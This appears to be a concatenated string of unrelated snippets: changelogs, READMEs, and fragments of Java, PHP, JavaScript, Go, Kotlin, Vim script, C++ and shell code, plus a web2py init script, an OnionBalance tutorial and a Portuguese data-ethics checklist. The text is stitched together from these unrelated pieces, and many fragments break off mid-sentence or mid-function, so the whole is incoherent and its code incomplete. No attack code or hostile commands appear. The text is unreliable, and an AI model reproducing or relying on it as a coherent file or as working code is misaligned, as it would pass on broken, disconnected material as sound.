{ get; private set;" +"NB: All recent commits are available online.\nThis file will not be updated further.\nSee https://github.com/gggeek/phpxmlrpc/commits/master\n\n2014-05-26 - G. Giunta (giunta.gaetano@gmail.com)\n\n\t* removed bundled phpunit\n\t* converted all tabs to spaces in php files and removed closing tags\n\n2014-05-12 - Samu Voutilainen (smar@smar.fi)\n\n\t* removed obsolete xml.so open; dl() is deprecated and removed from 5.3.0\n\t* removed deprecated xmlEntities\n\t* removed deprecated xmlrpc_backslash\n\t* converted $GLOBALS to internal class. This makes testing much easier and should be more flexible regarding other projects\n\t* changed verifyhost from 1 to 2. This makes modern php versions work properly.\n\t* split off each class in its own file\n\n2014-02-03 - G. Giunta (giunta.gaetano@gmail.com)\n\n\t* bumped up requirements to php 5.1.0\n\n2014-01-10 - G. Giunta (giunta.gaetano@gmail.com)\n\n\t* xmlrpc.inc: when using curl and keepalive, reset curl handle if we did not get back an http 200 response (eg a 302)\n\n\t* testsuite.php, parse_args.php: update testsuite\n\n\t* debugger/controller.php: change default path to javascript debugger\n\n2010-05-23 - G. Giunta (giunta.gaetano@gmail.com)\n\n\t* xmlrpc.inc: omit port on http 'Host' header if it is 80;\n\tadd a namespace declaration in response if ex:nil is in use\n\n2010-04-12 - G. Giunta (giunta.gaetano@gmail.com)\n\n\t* testsuite.php, parse_args.php: testsuite allows interrogating https servers ignoring" +"# Docker Builds for he-transformer with a _Reference-OS_\n\n## Introduction\n\nThis directory contains a basic build system for creating docker images of the _reference-OS_ on which he-transformer builds and unit tests are run. The purpose is to provide reference builds for _Continuous Integration_ used in developing and testing he-transformer.\n\nThe `Makefile` provides targets for:\n\n* Building the _reference-OS_ into a docker image\n* Building he-transformer and running unit tests in this cloned repo, mounted into the docker image of the _reference-OS_\n* Starting an interactive shell in the _reference-OS_ docker image, with the cloned repo available for manual builds and unit testing\n\nThe _make_ targets are designed to handle all aspects of building the _reference-OS_ docker image, running he-transformer builds and unit testing in it, and opening up a session in the docker image for interactive use. You should not need to issue any manual commands (unless you want to). In addition the `Dockerfile.he-transformer.*` files provide a description of how each _reference-OS_ environment is built, should you want to build your own server or docker image.\n\n## Prerequisites\n\nIn order to use the _make_ targets, you will need to do the following:\n\n* Have *docker* installed on your computer with" +"# 3.1.3 - 2017-11-21\n\n* **Fixed**: Disable non-working Google+ counter (#210 by @apotheosis91).\n* **Fixed**: `updateCounter`: append counter only once (#209 by @RunnX).\n\n# 3.1.2 - 2016-12-02\n\n* **Fixed**: popup position on dual-screen setups (#190 by @mshevtsov).\n\n# 3.1.1 - 2016-08-19\n\n* **Fixed**: Facebook counter API (#184 by @gldmtr, #186 by @xdimedrolx).\n* **Fixed**: ready state check after Twitter counter removal (#182 by @shvetsgroup).\n* Allow HTML in button captions (#109 by @thenexus00).\n\n# 3.1.0 - 2016-01-10\n\n* Fix Google+ counter.\n* Enable HTTPS for Odnoklassniki.\n* `ready.social-likes` now triggered after all counters (#166, by @scream4ik).\n* Open all popups with HTTPS.\n* Update popup sizes.\n\n3.0.15 was the last version available via Bower. Now Social Likes is available only via npm.\n\n# 3.0.15 - 2015-11-21\n\n* Disable discontinued Twitter button (#147).\n* Trigger counter update if number equals zero and zeroes option specified (#151, by @ColCh).\n\n# 3.0.14 - 2015-03-10\n\n* Revert counters changes from previous release because \n* Disable Odnoklassniki counter on HTTPS because of redirect to HTTP.\n* Show counters after 10 sec even if they aren\u2019t ready (instead of waiting for browser\u2019s 30 sec timeout).\n* Don\u2019t add a colon to tweet if it ends on" +"package play.data.binding;\n\nimport play.utils.Utils;\n\nimport java.util.Collection;\nimport java.util.HashMap;\nimport java.util.List;\nimport java.util.Map;\nimport java.util.Set;\n\npublic class ParamNode {\n private final String name;\n private final Map _children = new HashMap<>(8);\n private String[] values = null;\n private String originalKey;\n\n // splits a string on one-ore-more instances of .[]\n // this works so that all the following strings (param naming syntax)\n // is resolved into the same structural hierarchy:\n // a.b.c=12\n // a[b].c=12\n // a[b][c]=12\n // a.b[c]=12\n private static final String keyPartDelimiterRegexpString = \"[\\\\.\\\\[\\\\]]+\";\n\n public ParamNode(String name) {\n this.name = name;\n }\n\n public String getName() {\n return name;\n }\n\n public String[] getValues() {\n return values;\n }\n\n public String getFirstValue(Class type) {\n if (values == null) {\n return null;\n }\n\n if (values.length>1 && String.class.equals(type)) {\n // special handling for string - when multiple values, concatenate them with comma..\n return Utils.join(values, \", \");\n } else {\n return values[0];\n }\n }\n\n public void addChild( ParamNode child) {\n _children.put(child.name, child);\n }\n\n public ParamNode getChild(String name) {\n return getChild( name, false);\n }\n\n public ParamNode getChild(String name, boolean returnEmptyChildIfNotFound) {\n ParamNode child = getChild( name.split(keyPartDelimiterRegexpString));\n if (child == null && returnEmptyChildIfNotFound) {\n child = new ParamNode(name);\n }\n return child;\n }\n\n public static class RemovedNode {\n public final ParamNode" +"/**\n * RemoteFile is a representation of a file on a remote server which can be\n * fetched in chunks, e.g. using a Range request.\n * @flow\n */\n'use strict';\n\nimport Q from 'q';\nimport AbstractFile from './AbstractFile';\n\ntype Chunk = {\n start: number;\n stop: number;\n buffer: ArrayBuffer;\n // TODO(danvk): priority: number;\n}\n\n\nclass RemoteFile extends AbstractFile{\n url: string;\n fileLength: number;\n chunks: Array; // regions of file that have already been loaded.\n numNetworkRequests: number; // track this for debugging/testing\n\n constructor(url: string) {\n super();\n this.url = url;\n this.fileLength = -1; // unknown\n this.chunks = [];\n this.numNetworkRequests = 0;\n }\n\n getBytes(start: number, length: number): Q.Promise {\n if (length < 0) {\n return Q.reject(`Requested <0 bytes (${length}) from ${this.url}`);\n }\n\n // If the remote file length is known, clamp the request to fit within it.\n var stop = start + length - 1;\n if (this.fileLength != -1) {\n stop = Math.min(this.fileLength - 1, stop);\n }\n\n // First check the cache.\n var buf = this.getFromCache(start, stop);\n if (buf) {\n return Q.when(buf);\n }\n\n // TODO: handle partial overlap of request w/ cache.\n\n // Need to fetch from the network.\n return this.getFromNetwork(start, stop);\n }\n\n // Read the entire file -- not recommended for large files!\n getAll():" +"package com.kaspersky.kaspressample.docloc_tests.advanced\n\nimport android.Manifest\nimport android.graphics.Color\nimport androidx.test.rule.GrantPermissionRule\nimport com.kaspersky.kaspressample.docloc.ScreenshotSampleFragment\nimport com.kaspersky.kaspressample.docloc.ScreenshotSampleView\nimport com.kaspersky.kaspresso.annotations.ScreenShooterTest\nimport com.kaspersky.kaspresso.testcases.api.testcase.DocLocScreenshotTestCase\nimport org.junit.Rule\nimport org.junit.Test\n\n/**\n * An example of advanced [DocLocScreenshotTestCase] usage.\n * For more information see DocLoc wiki page.\n */\nclass AdvancedScreenshotSampleTest : ProductDocLocScreenshotTestCase() {\n\n private lateinit var fragment: ScreenshotSampleFragment\n private lateinit var view: ScreenshotSampleView\n\n @get:Rule\n val runtimePermissionRule: GrantPermissionRule = GrantPermissionRule.grant(\n Manifest.permission.WRITE_EXTERNAL_STORAGE,\n Manifest.permission.READ_EXTERNAL_STORAGE\n )\n\n @ScreenShooterTest\n @Test\n fun test() = before {\n fragment = ScreenshotSampleFragment()\n view = getUiSafeProxy(fragment as ScreenshotSampleView)\n activity.setFragment(fragment)\n }.after {\n }.run {\n step(\"1. Launch feature screen\") {\n view.setCounterValue(0)\n view.setBackgroundColor(Color.WHITE)\n captureScreenshot(\"1. Startup\")\n }\n\n step(\"2. Increase counter by 5\") {\n view.setCounterValue(5)\n captureScreenshot(\"2. Value has been increased by 5\")\n }\n\n step(\"3. Set red background color\") {\n view.setBackgroundColor(Color.RED)\n captureScreenshot(\"3. Background has been set to red\")\n }\n }\n}" +"The following article is compiled from postings made to emutos-devel by\nChristian Zietz, and used with his permission.\n\n\nMemory bank detection on the ST and STe\n=======================================\nFirst, keep in mind that I figured this out from looking at the code\nand testing on my ST. Jean-Fran\u00e7ois del Nero helped out a lot by doing\nthe STe tests, since I don't own an STe.\n\nMemory detection works individually for each bank by telling the MMU to\nassume 2 MB of RAM in that bank and then testing where patterns repeat.\nNow, the ST and the STE MMU differ on how they decode memory addresses.\nThus, these repetitions occur at different memory locations.\n\nDRAM is addressed by rows and columns, so the MMU decodes a RAM address\n(21 bits, A20-A0, to address a maximum of 2 MB per bank) into row and\ncolumn addresses. As the RAM data bus is 16 bits wide, A0 doesn't need\nto be decoded. In fact it's not even on the address bus. So we use 20\nbits, 10 for row and 10 for column.\n\nST memory bank detection\n------------------------\nThe address that is checked by the detection algorithm for a 512 kByte\nbank is 0x408" +"config = new Navee_ConfigModel();\n }\n\n /**\n * Sets the configuration variables passed into a navee tag\n *\n * @access public\n * @param $config\n */\n public function setConfig($config)\n {\n $this->config = Navee_ConfigModel::populateModel($config);\n $this->config->userGroups = $this->getUserGroupIdArray();\n }\n\n /**\n * @param $navigationHandle\n * @return string\n * @throws Exception\n * @return string\n */\n public function getNav($navigationHandle)\n {\n // get the nodes for this navigation\n if ($this->config->reverseNodes)\n {\n $criteria = craft()->elements->getCriteria('Navee_Node')->limit(null)->order('lft desc');\n }\n else\n {\n $criteria = craft()->elements->getCriteria('Navee_Node')->limit(null);\n }\n\n $criteria->navigation = $navigationHandle;\n $nodes = $criteria->find();\n $removedNodes = array();\n\n // variables\n $activeNodes = array();\n\n // before we proceed, ensure that we have nodes to work with\n if (sizeof($nodes))\n {\n // loop through all nodes to do the following\n // - set active classes\n // - remove any nodes not mean to be included\n foreach ($nodes as $k => $node)\n {\n // Set the link for this node based on the type\n $node = $this->setLink($node);\n $node->text = $node->title;\n\n // Check to see if" +"appraise 'rails_4_2' do\n gem 'rails', '~> 4.2.6'\n gem 'mysql2', '~> 0.4.0', :platform => :ruby\nend if RUBY_VERSION.to_f <= 2.4\n\nappraise 'rails_5_0' do\n if RUBY_PLATFORM == \"java\"\n gem 'rails', '5.0.6'\n else\n gem 'rails', '~> 5.0.7'\n end\n\n gem 'mysql2', '~> 0.4.0', :platform => :ruby\n\n gem 'jdbc-mysql', '~> 5.1.36', :platform => :jruby\n gem 'activerecord-jdbcmysql-adapter', '~> 50.0', :platform => :jruby\n gem 'activerecord-jdbcpostgresql-adapter', '~> 50.0', :platform => :jruby\nend if RUBY_PLATFORM != \"java\" || ENV[\"SPHINX_VERSION\"].to_f > 2.1\n\nappraise 'rails_5_1' do\n gem 'rails', '~> 5.1.0'\n gem 'mysql2', '~> 0.4.0', :platform => :ruby\nend if RUBY_PLATFORM != 'java'\n\nappraise 'rails_5_2' do\n gem 'rails', '~> 5.2.0'\n gem 'mysql2', '~> 0.5.0', :platform => :ruby\n gem 'pg', '~> 1.0', :platform => :ruby\nend if RUBY_PLATFORM != 'java'\n\nappraise 'rails_6_0' do\n gem 'rails', '~> 6.0.0'\n gem 'mysql2', '~> 0.5.0', :platform => :ruby\n gem 'pg', '~> 1.0', :platform => :ruby\nend if RUBY_PLATFORM != 'java' && RUBY_VERSION.to_f >= 2.5" +"/*\nModule : AADATE.CPP\nPurpose: Implementation for the algorithms which convert between the Gregorian and Julian calendars and the Julian Day\nCreated: PJN / 29-12-2003\nHistory: PJN / 10-11-2004 1. Fix for CAADate::Get so that it works correctly for propalactive calendar dates\n PJN / 15-05-2005 1. Fix for CAADate::Set(double JD, bool bGregorianCalendarCalendar) not setting the m_bGregorianCalendarCalendar\n member variable correctly. \n PJN / 26-01-2006 1. After a bug report from Ing. Taras Kapuszczak that a round trip of the date 25 January 100 as \n specified in the Gregorian calendar to the Julian day number and then back again produces the\n incorrect date 26 January 100, I've spent some time looking into the 2 key Meeus Julian Day\n algorithms. It seems that the algorithms which converts from a Calendar date to JD works ok for\n propalactive dates, but the reverse algorithm which converts from a JD to a Calendar date does not.\n Since I made the change in behaviour to support propalactive Gregorian dates to address issues\n with the Moslem calendar (and since then I have discovered further unresolved bugs in the Moslem\n calendar algorithms and advised people to check out my AA+ library instead), I am now reverting\n these changes so that" +"title: Checklist de \u00c9tica na Ci\u00eancia de Dados\nsections: \n - title: Coleta de dados\n section_id: A\n lines:\n - line_id: A.1\n line_summary: Consentimento informado\n line: se houver sujeitos humanos, eles deram consentimento informado, onde os sujeitos afirmativamente optaram por se inscrever e t\u00eam uma compreens\u00e3o clara dos usos dos dados para que consentiram?\n - line_id: A.2\n line_summary: Vi\u00e9s de coleta\n line: Consideramos as fontes de vi\u00e9s que poderiam ser introduzidas durante a coleta de dados e o desenho da pesquisa e tomamos medidas para mitig\u00e1-los?\n - line_id: A.3\n line_summary: Limita\u00e7\u00e3o de exposi\u00e7\u00e3o de IIP\n line: Consideramos maneiras de minimizar a exposi\u00e7\u00e3o de informa\u00e7\u00e3o de identifica\u00e7\u00e3o pessoal (IIP), por exemplo atrav\u00e9s de anonimiza\u00e7\u00e3o ou por n\u00e3o coletar informa\u00e7\u00e3o irrelevante para a an\u00e1lise?\n - title: Armazenamento de dados\n section_id: B\n lines:\n - line_id: B.1\n line_summary: Seguran\u00e7a de dados\n line: Temos um plano para proteger e dar seguran\u00e7a aos dados (por exemplo, criptografia no armazenamento e em tr\u00e2nsito, controles de acesso dos usu\u00e1rios internos e terceiros, registros de acesso e softwares atualizados)?\n - line_id: B.2\n line_summary: Direito ao esquecimento\n line: Temos um mecanismo pelo qual um indiv\u00edduo pode requerer a remo\u00e7\u00e3o de sua informa\u00e7\u00e3o pessoal?\n - line_id: B.3\n line_summary: Plano de reten\u00e7\u00e3o de dados" +"#!/usr/bin/env spn\n\n/*\n * fibfact.spn\n * recursive and iterative Fibonacci and factorial functions\n *\n * created by \u00c1rp\u00e1d Goretity on 30/09/2013\n */\n\nlet fib_rec = fn (n) -> n < 2 ? 1 : fib_rec(n - 1) + fib_rec(n - 2);\n\nlet fib_iter = fn (n) {\n\tlet f1 = 1, f2 = 1;\n\tfor let i = 0; i < n; i++ {\n\t\tf2 += f1;\n\t\tf1 = f2 - f1; // f1 = previous value of f2\n\t}\n\n\treturn f1;\n};\n\nlet fct_rec = fn (n) -> n < 2 ? 1 : n * fct_rec(n - 1);\n\nlet fct_iter = fn (n) {\n\tlet r = 1;\n\tfor let i = 2; i <= n; i++ {\n\t\tr *= i;\n\t}\n\n\treturn r;\n};\n\nlet n = toint($[1], 10);\n\nprint(fib_iter(n));\nprint(fib_rec(n));\n\nprint(fct_iter(n));\nprint(fct_rec(n));" +"import _ from \"lodash\";\nimport React, { Component } from \"react\";\nimport PropTypes from \"prop-types\";\nimport TaxonThumbnail from \"../../../taxa/show/components/taxon_thumbnail\";\n\nclass SpeciesNoAPI extends Component {\n secondaryNodeList( ) {\n const {\n lifelist, detailsTaxon, setScrollPage, config, zoomToTaxon,\n search, setSpeciesPlaceFilter, setDetailsTaxon\n } = this.props;\n let nodeShouldDisplay;\n const nodeIsDescendant = ( !detailsTaxon || detailsTaxon === \"root\" )\n ? ( ) => true\n : node => node.left >= detailsTaxon.left && node.right <= detailsTaxon.right;\n const obsCount = node => {\n if ( lifelist.speciesPlaceFilter\n && search\n && search.searchResponse\n && search.loaded\n ) {\n return search.searchResponse.results[node.id] || 0;\n }\n return node.descendant_obs_count;\n };\n if ( lifelist.speciesViewRankFilter === \"all\" ) {\n if ( !detailsTaxon || detailsTaxon === \"root\" ) {\n nodeShouldDisplay = nodeIsDescendant;\n } else {\n nodeShouldDisplay = node => (\n ( detailsTaxon.left === detailsTaxon.right - 1 && node.id === detailsTaxon.id )\n || ( node.left > detailsTaxon.left && node.right < detailsTaxon.right )\n );\n }\n } else if ( lifelist.speciesViewRankFilter === \"children\" ) {\n nodeShouldDisplay = node => node.parent_id === ( !detailsTaxon || detailsTaxon === \"root\" ? 0 : detailsTaxon.id );\n } else if ( lifelist.speciesViewRankFilter === \"major\" ) {\n nodeShouldDisplay = node => node.rank_level % 10 === 0;\n } else if ( lifelist.speciesViewRankFilter === \"kingdoms\" ) {\n nodeShouldDisplay = node => node.rank_level" +"\" Author: liuchengxu \n\" Description: List the jump list with the preview.\n\nlet s:save_cpo = &cpoptions\nset cpoptions&vim\n\nlet s:jumps = {}\n\nfunction! s:jumps.source() abort\n let cout = clap#api#win_execute(g:clap.start.winid, 'jumps')\n let s:jumplist = split(cout, '\\n')\n return [s:jumplist[0]] + reverse(s:jumplist[1:])\nendfunction\n\nfunction! s:jumps.sink(line) abort\n if empty(a:line)\n return\n endif\n let idx = index(s:jumplist, a:line)\n if idx == -1\n return\n endif\n let pointer = match(s:jumplist, '\\v^\\s*\\>')\n if pointer ==# a:line\n return\n endif\n let delta = idx - pointer\n let cmd = delta < 0 ? abs(delta).\"\\\" : delta.\"\\\"\n execute 'normal!' cmd\n normal! zz\nendfunction\n\nfunction! s:jumps.on_move() abort\n let curline = g:clap.display.getcurline()\n let matched = matchlist(curline, '^\\s\\+\\(\\d\\+\\)\\s\\+\\(\\d\\+\\)\\s\\+\\(\\d\\+\\)\\s\\+\\(.*\\)$')\n if len(matched) < 5\n return\n endif\n call clap#provider#marks#preview_impl(matched[2], matched[3], matched[4])\nendfunction\n\nlet s:jumps.syntax = 'clap_jumps'\nlet g:clap#provider#jumps# = s:jumps\n\nlet &cpoptions = s:save_cpo\nunlet s:save_cpo" +"/**\n * Class CommandInvoker. Takes all CLI operations and calls certain CLI operation depends of variables.\n */\nclass CommandInvoker {\n /**\n * Sets CLI operations (functions).\n * @constructor\n *\n * @param addModule - The function for creating a new module.\n * @param deleteModule - The function for deleting existing module.\n * @param chooseStack - The function for choosing stack of technologies.\n * @param deleteStack - The function for delete stack of technologies.\n */\n constructor(addModule, deleteModule, chooseStack, deleteStack) {\n this.addModule = addModule;\n this.deleteModule = deleteModule;\n this.chooseStack = chooseStack;\n this.deleteStack = deleteStack;\n }\n\n /**\n * Calls CLI operation with correct location.\n *\n * @param func - The func to call.\n * @param location - The location for a new module [client|server|both].\n * @param args - The function for deleting existing module.\n */\n static runCommand(func, { location, ...args }) {\n const runFunc = packageName => func({ ...args, packageName });\n\n if (location === 'both') {\n runFunc('client');\n runFunc('server');\n } else {\n runFunc(location);\n }\n }\n\n /**\n * Runs operation (function) for creating a new module.\n */\n runAddModule(args, options, logger) {\n runOperation(this.addModule, args, options, logger);\n }\n\n /**\n * Runs operation (function) for deleting existing module.\n */\n runDeleteModule(args, options, logger) {\n runOperation(this.deleteModule, args, options, logger);\n }\n\n /**\n *" +"import { createReducer } from '@reduxjs/toolkit'\nimport { Field, resetMintState, typeInput } from './actions'\n\nexport interface MintState {\n readonly independentField: Field\n readonly typedValue: string\n readonly otherTypedValue: string // for the case when there's no liquidity\n}\n\nconst initialState: MintState = {\n independentField: Field.CURRENCY_A,\n typedValue: '',\n otherTypedValue: ''\n}\n\nexport default createReducer(initialState, builder =>\n builder\n .addCase(resetMintState, () => initialState)\n .addCase(typeInput, (state, { payload: { field, typedValue, noLiquidity } }) => {\n if (noLiquidity) {\n // they're typing into the field they've last typed in\n if (field === state.independentField) {\n return {\n ...state,\n independentField: field,\n typedValue\n }\n }\n // they're typing into a new field, store the other value\n else {\n return {\n ...state,\n independentField: field,\n typedValue,\n otherTypedValue: state.typedValue\n }\n }\n } else {\n return {\n ...state,\n independentField: field,\n typedValue,\n otherTypedValue: ''\n }\n }\n })\n)" +"---\nname: \u2764\ufe0f Thank you\nabout: Tell us how the extension is helpful to you\ntitle: \"\"\nlabels: \"\"\nassignees: \"\"\n---\n\n## \u2764\ufe0f I'm using Abracadabra\n\n_Tell us how you're using it and what you really like about it!_\n\n## If you want to help us\n\nHave a look at [our contributing guide][contributing]. Contributions of any kind are welcome!\n\nHere are few ideas:\n\n- [Rate Abracadabra on the Marketplace][rate-abracadabra]\n- Share the link to your friends or colleagues\n- Help out with issues ([list of good first issues][good-first-issues])\n- Blog about the extension\n- Present Abracadabra at a local meetup\n\nIf you do, let us know. We'd love to hear from you!\n\nThank you! \ud83d\udc90\u2728\n\n[contributing]: https://github.com/nicoespeon/abracadabra/blob/master/CONTRIBUTING.md\n[rate-abracadabra]: https://marketplace.visualstudio.com/items?itemName=nicoespeon.abracadabra&ssr=false#review-details\n[good-first-issues]: https://github.com/nicoespeon/abracadabra/issues?q=is%3Aissue+is%3Aopen+label%3A%22%3Awave%3A+Good+first+issue%22" +"#!/bin/sh\n#\n# Author: Tyrone Hattingh\n# web2py issue: http://code.google.com/p/web2py/issues/detail?id=867\n#\n# 1) vi web2py-scheduler\n# 2) Paste in the above\n# 3) Add in the following 2 lines in the web2py-scheduler file\n# (required for centos i believe):\n#\n# # chkconfig: 2345 90 10\n# # description: web2py-scheduler\n#\n# 4) make it executable with\n#\n# chmod 755 web2py-scheduler\n#\n# 5) add it to startup with\n#\n# chkconfig --add web2py-scheduler\n#\n\nDAEMON=/usr/local/bin/python\nPARAMETERS=\"/var/www/html/web2py/web2py.py -K init\"\nLOGFILE=/var/log/web2py-scheduler.log\n\nstart() {\n echo -n \"starting up $DAEMON\"\n RUN=`$DAEMON $PARAMETERS > $LOGFILE 2>&1`\n if [ \"$?\" -eq 0 ]; then\n echo \" Done.\"\n else\n echo \" FAILED.\"\n fi\n}\nstop() {\n killall $DAEMON\n}\nstatus() {\n killall -0 $DAEMON\n if [ \"$?\" -eq 0 ]; then\n echo \"Running.\"\n else\n echo \"Not Running.\"\n fi\n}\ncase \"$1\" in\n start)\n start\n ;;\n restart)\n stop\n sleep 2\n start\n ;;\n stop)\n stop\n ;;\n status)\n status\n ;;\n *)\n echo \"usage : $0 start|restart|stop|status\"\n ;;\nesac\nexit 0" +"exceptionIfFalse($stream);\n\n return $stream;\n }\n\n /**\n * {@inheritdoc}\n */\n public function getContents($path)\n {\n $stream = $this->open($path, 'r');\n\n $contents = @stream_get_contents($stream);\n fclose($stream);\n\n $this->exceptionIfFalse($contents);\n\n return $contents;\n }\n\n /**\n * {@inheritdoc}\n */\n public function putContents($path, $buffer)\n {\n $stream = $this->open($path, 'w');\n\n $bytesWritten = @fwrite($stream, $buffer);\n fclose($stream);\n\n $this->exceptionIfFalse($bytesWritten);\n\n return $bytesWritten;\n }\n\n private function exceptionIfFalse($result)\n {\n if (false === $result) {\n $errorDetails = error_get_last();\n throw new RuntimeException($errorDetails['message']);\n }\n }\n\n /**\n * {@inheritdoc}\n */\n public function exists($path)\n {\n return file_exists($path);\n }\n\n /**\n * {@inheritdoc}\n */\n public function isDir($path)\n {\n return is_dir($path);\n }\n}" +"# Defining a Lagom build\n\nAs already discussed in [[Lagom build philosophy|BuildConcepts]], with Lagom you are free to combine all your services in a single build, or build them individually.\n\nBelow, we describe how to make a single build containing all your services. The `hello` sample follows this structure.\n\nThen, in the next section, we'll describe the alternative approach of one build per service.\n\n## Understanding your project structure\n\nEvery service contains at least two parts: an API project and an implementation project. (These are subprojects within the same build.)\n\nThe API project contains the service interface, also known as the descriptor, along with all the data models that the interface uses, e.g. request and response messages. The API project can be depended on and consumed by other services.\n\nThe implementation project will naturally also depend on the API project, in order to implement it.\n\nConsider the sample system below:\n\n![Lagom project structure](resources/guide/build/lagom-project-structure.png)\n\nThis system has two services, one called `hello`, and one called `hello-stream`. Each service has two sbt projects defined, an API project, `hello-api` and `hello-stream-api`, and an implementation project, `hello-impl` and `hello-stream-impl`. Additionally, `hello-stream-impl` depends on `hello-api`, and uses that to invoke calls on `hello`.\n\n* [Defining" +"package proj.zoie.perf.client;\n\nimport java.util.Comparator;\n\npublic class ZoiePerfVersion implements Comparable {\n\n public final long countVersion;\n public final long offsetVersion;\n\n ZoiePerfVersion(long v1, long v2) {\n countVersion = v1;\n offsetVersion = v2;\n }\n\n public static String toString(ZoiePerfVersion version) {\n return toString(version.countVersion, version.offsetVersion);\n }\n\n public static String toString(long count, long offset) {\n StringBuilder buf = new StringBuilder();\n buf.append(count).append(\":\").append(offset);\n return buf.toString();\n }\n\n public static ZoiePerfVersion fromString(String version) {\n long v1 = 0, v2 = 0;\n\n if (version != null && version.length() > 0) {\n String[] parts = version.split(\":\");\n v1 = Long.parseLong(parts[0]);\n v2 = Long.parseLong(parts[1]);\n }\n return new ZoiePerfVersion(v1, v2);\n }\n\n public static final Comparator COMPARATOR = new ZoiePerfVersionComparator();\n\n private static class ZoiePerfVersionComparator implements Comparator {\n @Override\n public int compare(String o1, String o2) {\n ZoiePerfVersion v1 = ZoiePerfVersion.fromString(o1);\n ZoiePerfVersion v2 = ZoiePerfVersion.fromString(o2);\n return v1.compareTo(v2);\n }\n }\n\n @Override\n public int compareTo(ZoiePerfVersion o) {\n if (offsetVersion == o.offsetVersion) return 0;\n if (offsetVersion < o.offsetVersion) return -1;\n return 1;\n }\n}" +"// Package storage implements operations for s3 and fs.\npackage storage\n\nimport (\n\t\"context\"\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"os\"\n\t\"time\"\n\n\t\"github.com/peak/s5cmd/storage/url\"\n\t\"github.com/peak/s5cmd/strutil\"\n)\n\nvar (\n\t// ErrGivenObjectNotFound indicates a specified object is not found.\n\tErrGivenObjectNotFound = fmt.Errorf(\"given object not found\")\n\n\t// ErrNoObjectFound indicates there are no objects found from a given directory.\n\tErrNoObjectFound = fmt.Errorf(\"no object found\")\n)\n\n// Storage is an interface for storage operations that is common\n// to local filesystem and remote object storage.\ntype Storage interface {\n\t// Stat returns the Object structure describing object. If src is not\n\t// found, ErrGivenObjectNotFound is returned.\n\tStat(ctx context.Context, src *url.URL) (*Object, error)\n\n\t// List the objects and directories/prefixes in the src.\n\tList(ctx context.Context, src *url.URL, followSymlinks bool) <-chan *Object\n\n\t// Delete deletes the given src.\n\tDelete(ctx context.Context, src *url.URL) error\n\n\t// MultiDelete deletes all items returned from given urls in batches.\n\tMultiDelete(ctx context.Context, urls <-chan *url.URL) <-chan *Object\n\n\t// Copy src to dst, optionally setting the given metadata. Src and dst\n\t// arguments are of the same type. If src is a remote type, server side\n\t// copying will be used.\n\tCopy(ctx context.Context, src, dst *url.URL, metadata Metadata) error\n}\n\nfunc NewLocalClient(opts Options) *Filesystem {\n\treturn &Filesystem{dryRun: opts.DryRun}\n}\n\nfunc" +".. _tutorial:\n\nTutorial\n========\n\nThis is a step-by-step tutorial to help you configure OnionBalance.\n\nOnionBalance implements `round-robin` like load balancing on top of Tor\nonion services. A typical OnionBalance deployment will incorporate one management\nservers and multiple backend application servers.\n\nAssumptions\n-----------\n\nYou want to run:\n\n- one or more OnionBalance processes, to perform load balancing, on hosts\n named ``obhost1``, ``obhost2``.\n- two or more Tor processes, to run the Onion Services, on hosts named\n ``torhost1``, ``torhost2``.\n- two or more servers (e.g. web servers) or traditional load balancers on\n hosts named ``webserver1``, ``webserver2``.\n\nScaling up:\n\n- the number of ``obhostX`` can be increased but this will not help handling\n more traffic.\n- the number of ``torhostX`` can be increased up to 60 instances to handle\n more traffic.\n- the number of ``webserverX`` can be increased to handle more traffic until\n the Tor daemons in front of them become the bottleneck.\n\nScaling down:\n\n- the three type of services can be run on the same hosts. The number of hosts\n can scale down to one.\n\nReliability:\n\nContrarily to traditional load balancers, the OnionBalance daemon does not\nreceive and forward traffic. As such, ``obhostX`` does not need to be in\nproximity" +"# Sharing GPU Resources\n\nOften times, teams are running big ML models on instances with GPU resources.\n\nGPU instances are expensive! You want to make sure that you're utilizing the GPUs you're paying for!\n\n## Without configuration\n\n[To deploy a pipeline that relies on GPU](gpus.md), you'll already have set the `gpu` resource requirement in the pipeline specification. But Pachyderm workers by default are long lived ... the worker is spun up and waits for new input. That works great for pipelines that are processing a lot of new incoming commits.\n\nFor ML workflows, especially during the development cycle, you probably will see lower volume of input commits. Which means that you could have your pipeline workers 'taking' the GPU resource as far as k8s is concerned, but 'idling' as far as you're concerned.\n\nLet's use an example.\n\nLet's say your cluster has a single GPU node with 2 GPUs. Let's say you have a pipeline running that requires 1 GPU. You've trained some models, and found the results were surprising. You suspect your feature extraction code, and are delving into debugging that stage of your pipeline. Meanwhile, the worker you've spun up for your GPU training job is sitting idle," +"\r\n// SineFB.h\r\n// ofxPDSP\r\n// Nicola Pisanti, MIT License, 2016\r\n\r\n\r\n#ifndef PDSP_OSC_SINEFB_H_INCLUDED\r\n#define PDSP_OSC_SINEFB_H_INCLUDED\r\n\r\n\r\n#include \"../base/OscillatorVariShape.h\"\r\n\r\n\r\nnamespace pdsp{\r\n\r\n /*!\r\n @brief Wavetable sine oscillator with self-fm\r\n \r\n This is a sine oscillator implemented with a 4096 point linearly interpolated wavetable. It performs really good as sine oscillator and fm operator. It has self-FM, controlled with in_shape() and should go from 0.0f to 4.0f (in_shape() is not clamped, beware).\r\n */\r\n \r\nclass SineFB : public OscillatorVariShape\r\n{\r\n\r\npublic:\r\n\r\n SineFB();\r\n ~SineFB();\r\n /*!\r\n @brief sets the default self-FM amount value and returns the unit ready to be patched.\r\n @param[in] fmFeedback self-FM value, input of this function is clamped to 0.0f-4.0f .\r\n */\r\n Patchable& set(float fmFeedback);\r\n \r\n \r\nprivate:\r\n void prepareOscillator( double sampleRate) override;\r\n void releaseOscillator() override;\r\n\r\n void oscillateShapeCR(float* outputBuffer, const float* phaseBuffer, const float shape, int bufferSize) noexcept override;\r\n void oscillateShapeAR(float* outputBuffer, const float* phaseBuffer, const float* shapeBuffer, int bufferSize) noexcept override;\r\n\r\n float fb_path;\r\n float alpha;\r\n float z1;\r\n\r\n static float* sineTable;\r\n static const double tableFakeSize;\r\n static uint64_t sineOscillatorsCreated;\r\n\r\n};\r\n\r\n}\r\n\r\n\r\n\r\n\r\n\r\n#endif // PDSP_OSC_SINEFB_H_INCLUDED" +"\ufeffusing System.Collections.Generic;\nusing System.Linq;\n\nusing Shouldly;\n\nusing Stove.Linq.Extensions;\n\nusing Xunit;\n\nnamespace Stove.Tests.Linq.Extensions\n{\n public class QueryableExtensionsTests\n {\n [Fact]\n public void PageBy_with_skip_and_maxresultcount_should_work()\n {\n var products = new List\n {\n new Product { Name = \"Oguzhan\" },\n new Product { Name = \"Soykan\" }\n };\n\n IQueryable productsQueryable = 